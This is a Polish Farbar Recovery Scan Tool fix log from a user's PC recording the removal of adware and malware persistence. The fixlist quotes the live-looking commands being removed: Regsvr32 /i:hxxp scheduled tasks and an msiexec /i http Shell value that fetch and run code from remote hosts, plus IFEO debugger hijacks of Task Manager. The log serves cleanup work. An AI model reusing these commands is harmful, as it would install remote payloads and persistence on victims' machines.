Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 28-05-2017 Uruchomiony przez Michał (28-05-2017 18:27:26) Run:1 Uruchomiony z D:\Downloads\antywir Załadowane profile: Michał (Dostępne profile: Michał) Tryb startu: Normal ============================================== fixlist - zawartość: ***************** CloseProcesses: CreateRestorePoint: Task: {AA2F5AA1-E61F-42A6-B2D2-82908FC1C595} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj8xMWlYOWIdN8FcFTFyOThQNWzSNjF8MkQWNdY4FTzWNq== scrobj.dll Task: {CAAE5885-CF5C-4396-B2CB-351343F4F421} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj8xMWlYOWIdN8FcFTFyOThQNWzSNjF8MkQWNdY4FTzWNq== scrobj.dll FirewallRules: [{CD91FEC5-B909-455D-BFA6-F2D988878524}] => (Allow) C:\Program Files (x86)\Everness\Application\chrome.exe FirewallRules: [{2184EBA4-E346-4471-B4F3-A76A961E90B9}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{F884D972-202D-4742-9811-8E5A129B9050}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe RemoveDirectory: C:\Program Files (x86)\Everness RemoveDirectory: C:\Users\Micha�\AppData\Local\Everness RemoveDirectory: C:\Users\Michal\AppData\Roaming\Everness RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Users\Micha�\AppData\Local\Firefox RemoveDirectory: C:\Users\Michal\AppData\Roaming\Firefox HKLM-x32\...\Run: [] => [X] HKU\S-1-5-21-2511481870-1426507333-4213709584-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8xMWlYOWIdN8FcFTFyOThQNWzSNjF8MkQWNdY4FTzWNq== /q IFEO\DisplaySwitch.exe: [Debugger] IFEO\taskmgr.exe: [Debugger] HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = S3 dbx; system32\DRIVERS\dbx.sys [X] S3 VGPU; System32\drivers\rdvgkmd.sys [X] RemoveDirectory: C:\Program Files (x86)\Elex-tech EmptyTemp: ***************** Procesy zostały pomyślnie zamknięte. Punkt przywracania został pomyślnie utworzony. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{AA2F5AA1-E61F-42A6-B2D2-82908FC1C595} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AA2F5AA1-E61F-42A6-B2D2-82908FC1C595} => klucz pomyślnie usunięto C:\Windows\System32\Tasks\PowerWord-SCT-JT => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PowerWord-SCT-JT => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CAAE5885-CF5C-4396-B2CB-351343F4F421} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CAAE5885-CF5C-4396-B2CB-351343F4F421} => klucz pomyślnie usunięto C:\Windows\System32\Tasks\Windows-WoShiBeiYongDe => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Windows-WoShiBeiYongDe => klucz pomyślnie usunięto HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{CD91FEC5-B909-455D-BFA6-F2D988878524} => Wartość pomyślnie usunięto HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{2184EBA4-E346-4471-B4F3-A76A961E90B9} => Wartość pomyślnie usunięto HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{F884D972-202D-4742-9811-8E5A129B9050} => Wartość pomyślnie usunięto "C:\Program Files (x86)\Everness" => nie znaleziono. "C:\Users\Michał\AppData\Local\Everness" => nie znaleziono. "C:\Users\Michal\AppData\Roaming\Everness" => nie znaleziono. "C:\Program Files (x86)\Firefox" => nie znaleziono. "C:\Users\Michał\AppData\Local\Firefox" => nie znaleziono. "C:\Users\Michal\AppData\Roaming\Firefox" => nie znaleziono. HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => Wartość pomyślnie usunięto HKU\S-1-5-21-2511481870-1426507333-4213709584-1000\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => Wartość pomyślnie usunięto HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\DisplaySwitch.exe => klucz pomyślnie usunięto HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe => klucz pomyślnie usunięto HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Page_URL => Wartość pomyślnie przywrócono HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Page_URL => Wartość pomyślnie przywrócono HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Search_URL => Wartość pomyślnie przywrócono HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Search_URL => Wartość pomyślnie przywrócono HKLM\System\CurrentControlSet\Services\dbx => klucz pomyślnie usunięto dbx => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\VGPU => klucz pomyślnie usunięto VGPU => serwis pomyślnie usunięto "C:\Program Files (x86)\Elex-tech" => pomyślnie usunięto. =========== EmptyTemp: ========== BITS transfer queue => 8388608 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 409210265 B Java, Flash, Steam htmlcache => 1373 B Windows/system/drivers => 372678001 B Edge => 0 B Chrome => 475900096 B Firefox => 379331988 B Opera => 0 B Temp, IE cache, history, cookies, recent: Users => 0 B Default => 0 B Public => 0 B ProgramData => 0 B systemprofile => 16932 B systemprofile32 => 9592384 B LocalService => 29921939 B NetworkService => 0 B Michał => 970947741 B RecycleBin => 3840500 B EmptyTemp: => 2.5 GB danych tymczasowych Usunięto. ================================ System wymagał restartu. ==== Koniec Fixlog 18:31:02 ====